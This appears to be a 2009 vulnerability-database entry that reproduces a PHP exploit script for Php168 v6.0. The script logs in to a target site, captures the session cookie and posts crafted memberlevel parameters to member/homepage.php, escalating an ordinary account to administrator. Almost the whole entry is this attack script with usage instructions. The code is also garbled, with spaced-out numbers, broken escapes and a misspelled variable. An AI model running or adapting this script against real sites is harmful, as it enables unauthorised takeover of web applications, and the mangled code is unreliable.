Php168 v6 mention the right vulnerability-vulnerability warning-the black bar safety net

2009-09-08T00:00:00
ID MYHACK58:62200924588
Type myhack58
Reporter 佚名
Modified 2009-09-08T00:00:00

Description

<? php

print_r(' +---------------------------------------------------------------------------+ Php168 v6. 0 update user access exploit +---------------------------------------------------------------------------+ '); /* * works regardless of php. ini settings / if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$ argv[0].' localhost /php168/ ryat 1 2 3 4 5 6 +---------------------------------------------------------------------------+ '); exit; }

error_reporting(7); ini_set('max_execution_time', 0);

$host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4];

$resp = send(); preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%0 9[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!\ nYou Are Admin Now!\ n"); else exit("Exploit Failed!\ n"); else exit("Exploit Failed!\ n");

function rands($length = 8) { $hash = "; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1 0 0 0 0 0 0); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)];

return $hash; }

function send() { global $host, $path, $user, $pass, $cookie;

if ($cookie) { $cookie[1] .= ';USR='. rands()."\ t31\t\t"; $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

$message = "POST ".$ path."member/homepage. php? uid=$cookie[2] HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n"; $message .= "Cookie: ".$ cookies[1]."\ r\n\r\n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2";

$message = "POST ".$ path."do/login.php HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; }

$fp = fsockopen($host, 8 0); fputs($fp, $message);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?& gt;